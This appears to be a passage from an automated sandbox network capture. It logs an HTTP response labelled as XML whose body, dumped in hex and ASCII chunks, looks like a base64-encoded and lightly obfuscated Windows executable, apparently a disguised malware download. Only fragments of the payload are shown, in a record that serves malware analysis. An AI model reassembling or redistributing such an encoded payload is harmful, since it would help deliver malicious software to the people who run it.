2022-01-30 12:44:51 UTC	2073	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:44:53 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 Last-Modified: Wed, 05 Jan 2022 22:10:13 GMT ETag: "ab044-5d4dd04921d60" Accept-Ranges: bytes Content-Length: 700484 Connection: close Content-Type: application/xml
2022-01-30 12:44:51 UTC	2074	IN	Data Raw: 49 41 4c 6a 51 57 73 79 56 30 35 54 51 67 41 41 2f 2f 38 41 41 4c 49 41 41 41 41 50 41 41 41 41 4c 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 41 41 41 41 41 6f 41 41 41 41 50 41 41 41 41 0d 0a 62 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 41 45 41 41 41 51 66 75 67 34 50 74 41 6e 4e 54 4f 42 79 44 61 55 54 41 79 59 2b 4d 53 42 77 63 6d 39 6e 63 6d 74 74 49 47 4e 75 62 6d 35 76 0d 0a 47 58 67 52 4a 45 68 41 49 69 42 33 4b 32 34 67 52 45 39 54 49 47 64 76 5a 47 55 68 44 51 30 4b 53 56 68 7a 51 57 67 79 56 30 35 6f 63 72 72 75 65 31 48 55 76 58 46 52 31 4c 31 30 55 64 53 39 0d 0a 41 6d 4b 6b 2f 52 35 6a 67 2f 4d 34 65 4e 47 38 32 31 48 55 76 57 55 36 30 4c 78 69 55 64 53 39 52 48 79 6a 2f 52 78 6a 67 2f 4e 2b 5a 74 65 38 62 46 48 55 76 53 4d 6b 30 Data Ascii: IALjQWsyV05TQgAA//8AALIAAAAPAAAALVhzQWgyV05XQgAAAAAAAAoAAAAPAAAAbVhzQWgyV05XQgAAAAEAAAQfug4PtAnNTOByDaUTAyY+MSBwcm9ncmttIGNubm5vGXgRJEhAIiB3K24gRE9TIGdvZGUhDQ0KSVhzQWgyV05ocrrue1HUvXFR1L10UdS9AmKk/R5jg/M4eNG821HUvWU60LxiUdS9RHyj/Rxjg/N+Zte8bFHUvSMk0
2022-01-30 12:44:51 UTC	2081	IN	Data Raw: 77 78 30 41 4c 41 41 41 41 0d 0a 62 54 4a 79 79 69 58 43 33 45 65 2f 30 5a 55 43 41 49 74 56 38 49 4e 43 42 4d 64 4b 2f 41 45 41 62 56 6a 34 42 48 43 37 45 71 62 63 44 78 53 4a 54 65 53 4c 56 52 71 4a 56 65 43 45 52 66 43 4c 0d 0a 4a 56 7a 77 67 48 69 37 47 71 4c 63 46 2b 79 4a 56 64 79 4c 52 65 4a 51 69 30 33 72 55 59 74 56 6a 51 72 34 42 4c 52 69 33 41 4f 6e 79 52 46 53 36 41 64 31 41 41 71 4c 52 66 43 45 53 41 53 4a 0d 0a 49 49 44 34 46 4c 43 37 41 70 72 63 42 39 53 4a 52 64 43 4c 54 64 71 4a 54 63 79 43 56 51 79 4a 4f 4a 44 34 42 4b 53 35 47 6f 62 63 55 34 6b 51 69 30 58 77 69 30 49 45 67 38 45 4c 69 55 33 45 0d 0a 35 67 32 33 79 44 33 79 33 41 75 58 79 30 57 38 69 30 32 38 69 55 65 34 6a 56 55 44 69 56 57 30 35 68 33 4c 79 69 57 47 33 46 2f 65 55 6f Data Ascii: wx0ALAAAAbTJyyiXC3Ee/0ZUCAItV8INCBMdK/AEAbVj4BHC7EqbcDxSJTeSLVRqJVeCERfCLJVzwgHi7GqLcF+yJVdyLReJQi03rUYtVjQr4BLRi3AOnyRFS6Ad1AAqLRfCESASJIID4FLC7AprcB9SJRdCLTdqJTcyCVQyJOJD4BKS5GobcU4kQi0Xwi0IEg8ELiU3E5g23yD3y3AuXy0W8i028iUe4jVUDiVW05h3LyiWG3F/eUo
2022-01-30 12:44:51 UTC	2097	IN	Data Raw: 35 64 61 56 30 6c 52 55 6d 53 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 50 4e 6d 66 34 57 67 79 56 78 30 42 46 59 6c 6c 38 49 6c 4e 36 49 46 46 36 49 6c 4b 70 49 74 4e 0d 0a 79 64 45 2b 37 65 4e 6e 76 38 63 43 68 6f 74 46 78 49 6c 46 32 49 46 4e 78 49 50 4f 42 49 6c 4e 75 64 4d 6d 6d 65 4e 33 58 32 56 56 67 2f 67 45 69 55 58 67 69 30 66 55 69 31 58 58 69 77 45 72 0d 0a 62 35 6d 4c 52 65 46 33 34 38 55 61 71 6f 6c 4e 6f 49 74 56 6f 49 4f 56 56 50 2f 77 2f 38 64 46 72 61 65 4d 76 6d 66 31 45 74 4b 6f 76 66 39 2f 69 30 57 63 69 55 2b 38 69 30 33 50 4f 30 32 38 0d 0a 48 6c 44 2b 46 4b 69 37 41 76 61 38 52 49 31 46 76 49 6c 46 75 49 46 4e 75 49 6c 43 6d 49 74 56 39 64 45 6d 31 65 4e 33 77 38 56 66 79 30 32 51 69 31 57 30 4f 31 2b 51 64 51 58 6e 6a 32 Data Ascii: 5daV0lRUmShAAAAAFpkiSUPAAAAPNmf4WgyVx0BFYll8IlN6IFF6IlKpItNydE+7eNnv8cChotFxIlF2IFNxIPOBIlNudMmmeN3X2VVg/gEiUXgi0fUi1XXiwErb5mLReF348UaqolNoItVoIOVVP/w/8dFraeMvmf1EtKovf9/i0WciU+8i03PO028HlD+FKi7Ava8RI1FvIlFuIFNuIlCmItV9dEm1eN3w8Vfy02Qi1W0O1+QdQXnj2
2022-01-30 12:44:51 UTC	2113	IN	Data Raw: 31 2b 67 55 75 69 33 78 41 4d 41 37 70 78 2f 79 69 33 61 56 41 74 48 51 55 55 59 69 55 57 63 69 30 66 63 4b 30 30 66 67 38 45 42 0d 0a 50 4e 4d 6d 39 57 74 6e 52 78 7a 63 42 35 78 51 36 49 2f 45 41 77 71 44 78 41 79 45 54 65 79 4a 49 4d 44 34 46 50 43 37 41 74 72 63 42 35 53 4a 52 5a 43 4e 54 64 71 4a 54 59 79 45 56 5a 43 4c 0d 0a 4b 4e 54 34 53 65 45 34 33 41 75 7a 79 55 33 30 5a 49 6b 4e 41 41 6f 41 41 49 76 71 58 63 49 55 62 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 71 2f 32 67 67 42 51 77 51 5a 4b 45 50 41 41 41 41 0d 0a 50 54 7a 36 5a 47 67 79 56 30 37 55 72 6d 53 4a 54 65 53 4c 52 65 36 4a 52 65 79 45 54 65 79 4c 50 45 6a 36 46 4c 53 35 47 71 71 2f 65 53 30 44 41 43 74 46 33 44 46 46 43 48 4d 4b 36 50 34 79 0d 0a 62 31 6a 34 42 4c 51 78 45 6b 62 65 Data Ascii: 1+gUui3xAMA7px/yi3aVAtHQUUYiUWci0fcK00fg8EBPNMm9WtnRxzcB5xQ6I/EAwqDxAyETeyJIMD4FPC7AtrcB5SJRZCNTdqJTYyEVZCLKNT4SeE43AuzyU30ZIkNAAoAAIvqXcIUbZS/jaT+m4ICyexq/2ggBQwQZKEPAAAAPTz6ZGgyV07UrmSJTeSLRe6JReyETeyLPEj6FLS5Gqq/eS0DACtF3DFFCHMK6P4yb1j4BLQxEkbe
2022-01-30 12:44:51 UTC	2129	IN	Data Raw: 69 33 4b 33 45 52 73 43 67 68 30 46 49 74 56 43 49 4e 56 38 49 74 4b 38 46 43 4c 0d 0a 49 4b 53 62 2b 50 66 4e 71 4b 56 4d 79 55 30 49 69 55 33 73 69 31 2f 73 55 6f 74 4b 39 49 73 49 50 4e 4d 2b 76 59 43 4e 2f 62 47 6f 79 30 58 6f 69 2b 56 64 77 67 34 41 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 72 79 55 58 38 69 55 58 34 69 30 66 34 67 38 45 4c 69 55 33 30 35 67 32 48 79 69 33 4b 33 45 52 73 43 67 68 30 46 49 74 56 43 49 4e 56 38 49 74 4b 38 46 43 4c 0d 0a 49 4b 53 62 6d 50 66 4e 71 4b 56 4d 79 55 30 49 69 55 33 73 69 31 2f 73 55 6f 74 4b 39 49 73 49 50 4e 4d 2b 76 59 44 4e 2b 37 47 6f 79 30 58 6f 69 2b 56 64 77 67 34 41 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 72 79 55 58 38 69 55 58 34 69 30 66 34 67 38 45 4c Data Ascii: i3K3ERsCgh0FItVCINV8ItK8FCLIKSb+PfNqKVMyU0IiU3si1/sUotK9IsIPNM+vYCN/bGoy0Xoi+Vdwg4AzMzDzMzMONOfwoQq3gOryUX8iUX4i0f4g8ELiU305g2Hyi3K3ERsCgh0FItVCINV8ItK8FCLIKSbmPfNqKVMyU0IiU3si1/sUotK9IsIPNM+vYDN+7Goy0Xoi+Vdwg4AzMzDzMzMONOfwoQq3gOryUX8iUX4i0f4g8EL
2022-01-30 12:44:51 UTC	2145	IN	Data Raw: 6b 65 6f 69 45 33 71 44 37 5a 56 0d 0a 69 4e 32 68 54 75 77 6b 56 6b 35 58 7a 30 58 4d 69 59 55 63 2f 2f 58 2f 69 30 33 2f 67 38 45 45 35 4e 56 58 76 70 66 4e 37 55 70 58 51 67 42 72 77 76 2b 4c 6a 53 37 2f 2f 2f 38 4d 51 51 53 4a 0d 0a 36 48 69 4d 76 70 65 35 77 6d 36 6f 76 66 2b 4c 41 6f 74 49 43 49 4f 4e 46 50 2f 77 2f 34 75 56 63 61 65 4d 76 75 47 6e 54 37 47 6f 76 59 75 46 47 50 2f 2f 2f 31 71 4c 6a 52 54 77 2f 2f 2f 6f 0d 0a 41 59 75 4d 76 71 35 33 73 30 2f 63 44 2f 43 44 77 51 53 4a 6a 52 72 2f 2f 2f 2b 31 42 41 41 41 62 54 4f 78 76 75 4f 2f 52 37 47 6f 76 51 4e 42 42 49 6d 46 44 50 58 2f 2f 34 75 61 44 50 2f 2f 0d 0a 6b 74 4e 78 79 69 41 36 33 73 4f 4c 76 50 2f 2f 69 35 58 63 2f 76 58 2f 69 5a 55 4c 2f 2f 2f 2f 31 55 68 7a 51 57 68 5a 6e 37 48 63 Data Ascii: keoiE3qD7ZViN2hTuwkVk5Xz0XMiYUc//X/i03/g8EE5NVXvpfN7UpXQgBrwv+LjS7///8MQQSJ6HiMvpe5wm6ovf+LAotICIONFP/w/4uVcaeMvuGnT7GovYuFGP///1qLjRTw///oAYuMvq53s0/cD/CDwQSJjRr///+1BAAAbTOxvuO/R7GovQNBBImFDPX//4uaDP//ktNxyiA63sOLvP//i5Xc/vX/iZUL////1UhzQWhZn7Hc
2022-01-30 12:44:51 UTC	2161	IN	Data Raw: 36 5a 47 67 79 56 30 37 55 72 69 6a 48 52 65 41 41 41 41 6f 41 61 68 54 6e 33 52 45 44 62 64 75 33 52 65 46 33 75 34 6b 53 76 67 41 41 41 41 43 44 66 65 59 41 64 42 65 45 52 51 79 4a 0d 0a 4b 49 54 34 44 4c 52 6a 33 41 4f 37 71 6e 49 55 2f 2f 2b 4a 52 65 4c 72 42 38 64 4b 36 41 41 41 62 56 6a 34 46 49 43 37 41 70 61 51 42 2f 7a 2f 2f 2f 2f 2f 69 30 2f 59 69 55 58 72 78 30 58 4d 0d 0a 62 56 68 7a 51 61 39 33 68 30 35 58 51 67 43 4c 54 65 53 44 77 51 61 4a 54 64 53 45 56 64 53 4a 4f 4a 54 34 42 49 79 37 45 70 37 63 44 77 6a 48 41 51 41 41 41 41 71 4c 56 51 6a 49 51 67 51 41 0d 0a 62 56 68 7a 7a 43 33 2b 33 67 75 6e 79 55 30 49 69 31 58 77 69 77 69 4a 41 59 74 43 43 49 74 56 6e 64 4d 78 52 65 46 7a 55 38 55 61 73 73 63 42 41 41 41 41 41 49 46 56 38 4d 64 4e Data Ascii: 6ZGgyV07UrijHReAAAAoAahTn3REDbdu3ReF3u4kSvgAAAACDfeYAdBeERQyJKIT4DLRj3AO7qnIU//+JReLrB8dK6AAAbVj4FIC7ApaQB/z/////i0/YiUXrx0XMbVhzQa93h05XQgCLTeSDwQaJTdSEVdSJOJT4BIy7Ep7cDwjHAQAAAAqLVQjIQgQAbVhzzC3+3gunyU0Ii1XwiwiJAYtCCItVndMxReFzU8UasscBAAAAAIFV8MdN
2022-01-30 12:44:51 UTC	2177	IN	Data Raw: 46 39 41 6f 41 41 41 41 41 74 6b 58 30 36 4a 67 48 59 5a 6f 39 52 77 74 48 54 56 63 46 6f 49 49 47 45 50 67 50 45 55 55 66 69 30 30 49 0d 0a 71 31 6c 65 79 6a 30 36 31 49 78 57 79 31 55 49 38 67 38 51 52 52 70 6d 44 79 34 4b 65 49 49 47 66 63 65 46 68 53 78 49 59 73 55 53 53 73 59 41 4d 49 74 4e 43 49 6e 42 41 59 6c 43 43 49 74 56 0d 0a 5a 5a 35 78 62 2b 4e 33 58 38 32 58 51 34 6c 46 43 49 74 4e 43 4d 77 42 4d 49 74 61 43 49 50 43 62 4e 45 6d 53 65 4e 33 58 36 65 6a 51 67 41 41 69 30 55 4d 4b 30 38 49 67 2f 67 65 66 52 64 6f 0d 0a 7a 32 31 7a 51 51 43 61 4d 6b 68 48 4b 74 42 39 42 68 44 6f 46 36 67 44 41 49 50 4c 44 4d 64 46 6b 56 68 7a 51 57 6a 31 45 72 35 58 51 67 41 41 67 2b 77 49 38 67 55 51 52 52 44 39 44 78 45 45 0d 0a 53 64 55 6d 73 54 71 2f 45 72 Data Ascii: F9AoAAAAAtkX06JgHYZo9RwtHTVcFoIIGEPgPEUUfi00Iq1leyj061IxWy1UI8g8QRRpmDy4KeIIGfceFhSxIYsUSSsYAMItNCInBAYlCCItVZZ5xb+N3X82XQ4lFCItNCMwBMItaCIPCbNEmSeN3X6ejQgAAi0UMK08Ig/gefRdoz21zQQCaMkhHKtB9BhDoF6gDAIPLDMdFkVhzQWj1Er5XQgAAg+wI8gUQRRD9DxEESdUmsTq/Er
2022-01-30 12:44:51 UTC	2193	IN	Data Raw: 32 76 61 38 79 34 38 78 52 55 6a 50 4a 69 31 58 38 67 38 67 45 69 51 71 47 53 67 53 4c 0d 0a 4b 4b 54 77 67 57 78 69 33 41 4e 66 77 63 45 45 55 65 68 74 78 77 67 41 67 38 51 48 69 31 58 38 71 6c 71 6e 4a 57 34 69 33 41 75 72 79 55 30 49 69 31 45 4d 69 56 6f 4d 69 30 58 7a 67 38 41 51 0d 0a 35 42 32 4c 79 69 58 4b 6b 45 2f 6a 77 41 59 51 4d 39 4b 4c 52 66 4b 44 77 41 53 47 45 49 6c 51 61 64 4d 2b 75 65 76 7a 55 78 2f 63 46 77 69 44 77 68 52 53 36 43 6e 48 41 67 43 4d 78 41 69 4c 0d 0a 4b 4b 43 30 51 55 53 78 55 56 37 63 42 2f 79 4c 35 56 33 43 42 41 72 4d 7a 4d 7a 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 52 69 55 33 38 69 30 2f 38 78 77 43 37 67 67 59 51 0d 0a 58 70 48 34 46 4a 53 78 6c 55 72 65 53 49 6c 4b 42 49 74 46 2f 49 6e 41 42 46 Data Ascii: 2va8y48xRUjPJi1X8g8gEiQqGSgSLKKTwgWxi3ANfwcEEUehtxwgAg8QHi1X8qlqnJW4i3AuryU0Ii1EMiVoMi0Xzg8AQ5B2LyiXKkE/jwAYQM9KLRfKDwASGEIlQadM+uevzUx/cFwiDwhRS6CnHAgCMxAiLKKC0QUSxUV7cB/yL5V3CBArMzMzDzMzMoZS/jaT+m4ICyexRiU38i0/8xwC7ggYQXpH4FJSxlUreSIlKBItF/InABF
2022-01-30 12:44:51 UTC	2209	IN	Data Raw: 47 52 65 2b 39 78 6b 58 70 43 73 5a 46 0d 0a 69 70 61 31 42 49 41 35 6b 51 75 2b 4e 73 5a 46 36 74 2f 47 52 65 47 75 78 6b 58 6a 4e 4d 5a 46 67 4d 75 31 42 49 5a 5a 39 75 72 2f 52 52 43 44 34 41 45 50 68 59 49 41 41 41 43 45 44 61 53 6f 0d 0a 61 6b 6a 77 69 47 6d 37 57 75 72 2f 52 52 44 47 42 61 4f 6f 42 78 6f 42 44 31 66 50 5a 67 38 54 4b 4b 69 59 55 2b 4e 6e 70 38 32 56 51 34 74 46 39 49 50 51 41 49 4e 56 38 49 6c 4b 39 49 4e 39 0d 0a 6d 56 67 45 41 68 6f 30 31 44 4f 6e 54 58 4d 37 61 67 42 71 41 59 46 4e 39 46 47 45 56 66 42 53 68 57 76 36 51 32 69 35 70 2f 5a 57 51 67 41 41 61 38 67 41 6a 58 59 4e 34 47 6f 50 61 67 47 4c 0d 0a 4f 4b 77 68 79 69 33 43 42 36 5a 44 79 77 49 41 69 67 77 33 69 49 4b 55 71 41 63 66 36 36 56 6f 48 58 5a 31 55 59 44 55 33 30 Data Ascii: GRe+9xkXpCsZFipa1BIA5kQu+NsZF6t/GReGuxkXjNMZFgMu1BIZZ9ur/RRCD4AEPhYIAAACEDaSoakjwiGm7Wur/RRDGBaOoBxoBD1fPZg8TKKiYU+Nnp82VQ4tF9IPQAINV8IlK9IN9mVgEAho01DOnTXM7agBqAYFN9FGEVfBShWv6Q2i5p/ZWQgAAa8gAjXYN4GoPagGLOKwhyi3CB6ZDywIAigw3iIKUqAcf66VoHXZ1UYDU30
2022-01-30 12:44:51 UTC	2225	IN	Data Raw: 4c 51 6a 71 55 42 70 56 55 37 64 54 6a 65 49 69 4a 43 6d 42 78 72 72 70 57 6a 50 50 51 59 51 68 61 49 70 51 32 69 78 6b 30 72 76 30 71 59 48 45 46 39 65 69 2b 39 64 77 38 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 52 79 41 52 6e 65 44 2f 7a 48 52 66 67 76 41 41 6f 41 78 6b 58 50 43 63 5a 46 72 42 69 31 42 4b 6f 44 6b 51 75 55 50 63 5a 46 78 4c 4c 47 52 63 38 5a 78 6b 58 4a 45 73 5a 46 0d 0a 71 6b 4f 31 42 4b 41 4e 6b 51 75 65 47 38 5a 46 79 6a 50 47 52 63 45 78 78 6b 58 44 73 73 5a 46 6f 45 47 31 42 4b 5a 6e 6b 51 75 59 46 4d 5a 46 30 44 37 47 52 64 74 59 78 6b 58 64 4d 4d 5a 46 0d 0a 76 6a 75 31 42 4c 79 51 6b 51 75 43 46 63 5a 46 31 6c 62 47 52 64 30 49 78 6b 58 58 65 38 5a 46 74 45 57 31 42 4c 49 70 6b 51 75 4d 50 38 5a 46 33 4c 66 47 52 64 63 2b 78 6b Data Ascii: LQjqUBpVU7dTjeIiJCmBxrrpWjPPQYQhaIpQ2ixk0rv0qYHEF9ei+9dw8zDzMzMONOfwoRyARneD/zHRfgvAAoAxkXPCcZFrBi1BKoDkQuUPcZFxLLGRc8ZxkXJEsZFqkO1BKANkQueG8ZFyjPGRcExxkXDssZFoEG1BKZnkQuYFMZF0D7GRdtYxkXdMMZFvju1BLyQkQuCFcZF1lbGRd0IxkXXe8ZFtEW1BLIpkQuMP8ZF3LfGRdc+xk
2022-01-30 12:44:51 UTC	2241	IN	Data Raw: 6e 50 47 52 65 6e 6b 78 6b 58 72 79 4d 5a 46 69 4b 69 31 42 49 36 4f 6b 51 75 77 74 38 5a 46 36 4a 50 47 52 65 50 75 78 6b 58 6c 63 63 5a 46 0d 0a 68 76 4f 31 42 49 54 2b 6b 51 75 36 75 4d 5a 46 37 72 6a 47 52 65 57 62 6f 65 69 51 42 78 43 44 6a 56 6c 38 78 4f 41 79 56 30 37 63 54 2b 69 66 42 78 43 44 79 51 75 4a 44 65 69 51 42 78 44 47 0d 0a 61 4c 7a 73 52 6e 67 7a 57 42 6d 58 4a 41 38 54 52 66 44 72 45 6f 46 56 38 49 50 4e 41 59 74 46 6d 64 75 6a 51 65 46 6e 70 38 63 53 74 6f 4e 39 39 41 42 33 51 33 67 47 67 33 33 2f 45 48 4d 37 0d 0a 42 31 67 5a 51 4f 4e 2f 6f 78 2f 63 46 2f 42 53 36 41 38 73 41 67 71 4c 38 4c 67 4f 41 41 41 41 42 70 42 7a 7a 42 51 2f 74 79 52 58 4b 41 47 4c 56 66 52 53 69 30 2f 77 55 4f 6a 2f 4b 77 49 41 0d 0a 35 31 52 45 79 65 44 6d Data Ascii: nPGRenkxkXryMZFiKi1BI6OkQuwt8ZF6JPGRePuxkXlccZFhvO1BIT+kQu6uMZF7rjGReWboeiQBxCDjVl8xOAyV07cT+ifBxCDyQuJDeiQBxDGaLzsRngzWBmXJA8TRfDrEoFV8IPNAYtFmdujQeFnp8cStoN99AB3Q3gGg33/EHM7B1gZQON/ox/cF/BS6A8sAgqL8LgOAAAABpBzzBQ/tyRXKAGLVfRSi0/wUOj/KwIA51REyeDm
2022-01-30 12:44:51 UTC	2257	IN	Data Raw: 78 7a 34 46 4a 52 67 76 35 32 74 51 77 43 44 78 41 69 4c 52 66 61 4c 35 56 33 4e 42 41 44 4d 0d 0a 4f 4e 4f 66 4b 35 64 61 39 30 6c 52 55 6d 53 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 37 72 52 2f 79 43 58 65 33 41 75 37 77 65 68 6f 69 55 58 6f 69 30 66 6f 67 38 46 6e 36 4b 35 55 0d 0a 6b 71 66 34 44 49 43 78 6c 69 62 65 44 2f 43 4c 56 66 44 48 41 6c 70 6c 42 68 44 49 52 66 77 41 62 56 68 7a 79 69 33 43 6b 45 34 58 4a 67 59 51 69 30 33 77 55 65 4b 51 39 51 45 50 67 38 51 45 0d 0a 71 68 32 50 76 70 66 4e 71 4d 55 43 53 6f 50 69 41 58 51 55 61 4c 6f 41 41 41 43 45 52 65 79 44 68 54 41 6a 71 53 37 49 56 6b 37 55 68 67 69 4c 52 65 79 44 36 47 4b 4c 54 66 52 72 69 51 30 41 0d 0a 62 56 68 7a 79 6f 31 76 6c 55 70 58 6a 73 7a 4d 7a 4d 7a 4d 7a 46 2b 4c Data Ascii: xz4FJRgv52tQwCDxAiLRfaL5V3NBADMONOfK5da90lRUmShAAAAAFpkiSUPAAAA7rR/yCXe3Au7wehoiUXoi0fog8Fn6K5Ukqf4DICxlibeD/CLVfDHAlplBhDIRfwAbVhzyi3CkE4XJgYQi03wUeKQ9QEPg8QEqh2PvpfNqMUCSoPiAXQUaLoAAACEReyDhTAjqS7IVk7UhgiLReyD6GKLTfRriQ0AbVhzyo1vlUpXjszMzMzMzF+L
2022-01-30 12:44:51 UTC	2273	IN	Data Raw: 51 45 41 69 59 2f 30 2b 66 2f 77 6a 59 31 49 0d 0a 6d 4b 65 4d 71 63 41 58 71 4c 48 63 56 79 43 66 42 78 42 53 6f 54 61 66 42 78 42 66 6a 55 33 6b 68 56 75 51 76 4a 64 69 76 35 4f 49 76 2f 38 50 74 73 69 46 79 51 57 45 6c 77 49 50 41 49 50 73 0d 0a 64 64 4f 6e 79 4d 33 43 72 72 47 6f 45 4b 48 4d 6e 67 63 51 55 49 64 4e 35 4f 6a 58 34 76 33 2f 35 70 43 62 45 49 7a 50 71 4b 5a 62 55 67 41 41 69 45 58 4e 69 6b 66 4e 69 45 33 44 44 37 5a 56 0d 0a 6f 64 32 68 54 75 77 44 56 6b 35 58 4b 41 43 44 37 42 69 4c 78 49 4f 6c 37 50 6e 77 2f 31 43 4c 59 44 7a 73 52 6e 68 6a 32 67 4f 7a 71 70 72 69 2f 66 2b 4c 79 4f 49 54 35 50 33 77 69 59 58 6f 0d 0a 6c 4b 65 4d 68 79 33 4f 49 38 32 37 57 6f 76 4d 69 61 58 6b 2b 66 58 2f 6a 56 57 72 55 75 69 31 6d 71 61 4d 79 4f 33 53 Data Ascii: QEAiY/0+f/wjY1ImKeMqcAXqLHcVyCfBxBSoTafBxBfjU3khVuQvJdiv5OIv/8PtsiFyQWElwIPAIPsddOnyM3CrrGoEKHMngcQUIdN5OjX4v3/5pCbEIzPqKZbUgAAiEXNikfNiE3DD7ZVod2hTuwDVk5XKACD7BiLxIOl7Pnw/1CLYDzsRnhj2gOzqpri/f+LyOIT5P3wiYXolKeMhy3OI827WovMiaXk+fX/jVWrUui1mqaMyO3S
2022-01-30 12:44:51 UTC	2289	IN	Data Raw: 0a 71 56 7a 36 42 4c 44 30 45 72 4a 56 7a 34 30 59 2f 76 2f 2f 36 47 59 41 2f 2f 2b 43 68 65 54 39 6b 71 63 6a 79 69 58 71 33 46 2f 63 44 39 69 4c 51 68 54 2f 30 49 46 4e 33 49 50 47 42 49 6c 4e 0d 0a 73 5a 34 32 76 57 79 35 41 70 62 63 51 49 74 4e 32 49 74 51 45 50 58 53 69 45 58 6b 69 30 58 49 56 68 31 58 54 75 79 39 56 30 35 58 79 55 33 59 69 78 47 4c 54 64 4b 4c 51 67 7a 77 30 49 68 46 0d 0a 67 4e 58 2b 61 5a 62 4e 71 4d 63 61 2f 6f 74 56 76 49 6d 56 58 50 58 2f 2f 34 74 4b 76 49 4e 34 65 55 67 42 54 61 2b 33 4e 37 47 6f 76 51 45 41 41 41 44 72 43 73 32 46 59 50 2f 77 2f 77 41 41 0d 0a 62 56 6a 35 7a 41 6a 4e 71 4c 48 66 44 2b 34 50 74 6c 58 75 68 64 68 30 46 34 74 4b 76 49 73 49 35 4e 57 48 76 35 66 4e 33 4e 75 6a 76 50 2f 2f 69 5a 56 63 2f 2f 58 2f Data Ascii: qVz6BLD0ErJVz40Y/v//6GYA//+CheT9kqcjyiXq3F/cD9iLQhT/0IFN3IPGBIlNsZ42vWy5ApbcQItN2ItQEPXSiEXki0XIVh1XTuy9V05XyU3YixGLTdKLQgzw0IhFgNX+aZbNqMca/otVvImVXPX//4tKvIN4eUgBTa+3N7GovQEAAADrCs2FYP/w/wAAbVj5zAjNqLHfD+4PtlXuhdh0F4tKvIsI5NWHv5fN3NujvP//iZVc//X/
2022-01-30 12:44:51 UTC	2305	IN	Data Raw: 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 37 72 52 50 79 43 58 61 33 41 75 2f 79 30 58 73 69 30 33 73 69 55 66 77 69 31 58 6a 67 38 49 45 0d 0a 35 41 32 76 79 69 33 65 31 49 35 66 79 30 58 59 69 30 33 77 67 7a 4d 41 44 34 53 52 41 41 41 41 35 67 32 76 79 6d 71 37 45 6f 72 63 44 2f 43 4c 45 59 6c 56 77 49 46 46 36 49 6c 4b 31 49 74 4e 0d 0a 75 64 45 2b 2f 65 4e 6e 76 38 63 43 6b 6f 74 46 30 49 6c 46 75 49 46 4e 32 49 74 61 38 49 73 42 52 6c 71 79 75 57 71 37 45 6f 4c 63 44 2f 43 4c 45 59 6c 56 79 49 46 46 7a 4d 48 76 41 6f 6c 46 0d 0a 69 64 4d 2b 69 65 46 2f 74 34 6b 53 76 67 41 41 41 41 43 42 66 65 34 41 45 41 41 50 63 67 32 4e 4f 4c 77 68 7a 43 33 53 42 36 59 62 2b 50 2f 2f 69 30 33 6b 55 59 46 56 34 46 4c 6e 68 57 34 42 0d 0a 62 64 75 33 53 61 Data Ascii: hAAAAAFpkiSUPAAAA7rRPyCXa3Au/y0Xsi03siUfwi1Xjg8IE5A2vyi3e1I5fy0XYi03wgzMAD4SRAAAA5g2vymq7EorcD/CLEYlVwIFF6IlK1ItNudE+/eNnv8cCkotF0IlFuIFN2Ita8IsBRlqyuWq7EoLcD/CLEYlVyIFFzMHvAolFidM+ieF/t4kSvgAAAACBfe4AEAAPcg2NOLwhzC3SB6Yb+P//i03kUYFV4FLnhW4Bbdu3Sa
2022-01-30 12:44:51 UTC	2321	IN	Data Raw: 6f 6a 67 75 30 45 41 49 79 50 55 54 63 46 2f 78 53 36 41 66 6e 2f 2f 57 4c 52 66 7a 4a 51 41 6f 41 0d 0a 35 72 30 75 67 71 54 2b 6d 34 4b 62 6a 73 7a 4d 7a 4d 7a 4d 7a 46 2b 4c 37 46 47 47 54 66 79 4c 4b 4b 52 38 39 79 41 6a 30 6f 63 6a 58 47 69 56 79 7a 63 68 61 4a 39 44 59 2f 39 6c 41 47 6f 52 0d 0a 35 67 32 50 45 34 44 31 73 62 47 6f 79 55 58 38 78 6b 41 52 41 49 48 6c 58 63 50 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 52 69 55 33 38 69 30 2f 38 44 37 5a 48 45 59 58 4a 0d 0a 47 55 59 62 68 4d 30 4e 64 69 5a 43 6c 5a 73 46 61 67 42 71 45 59 46 56 2f 46 4c 6e 68 2b 62 2f 6b 74 4d 32 76 61 35 79 52 6b 37 63 70 31 33 44 7a 4d 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 45 4f 46 2f 71 38 55 53 76 67 2b 32 53 42 4b 46 79 58 Data Ascii: ojgu0EAIyPUTcF/xS6Afn//WLRfzJQAoA5r0ugqT+m4KbjszMzMzMzF+L7FGGTfyLKKR89yAj0ocjXGiVyzchaJ9DY/9lAGoR5g2PE4D1sbGoyUX8xkARAIHlXcPDzMzMoZS/jaT+m4ICyexRiU38i0/8D7ZHEYXJGUYbhM0NdiZClZsFagBqEYFV/FLnh+b/ktM2va5yRk7cp13DzMzMzMbMzMzDzMzMONOfEOF/q8USvg+2SBKFyX
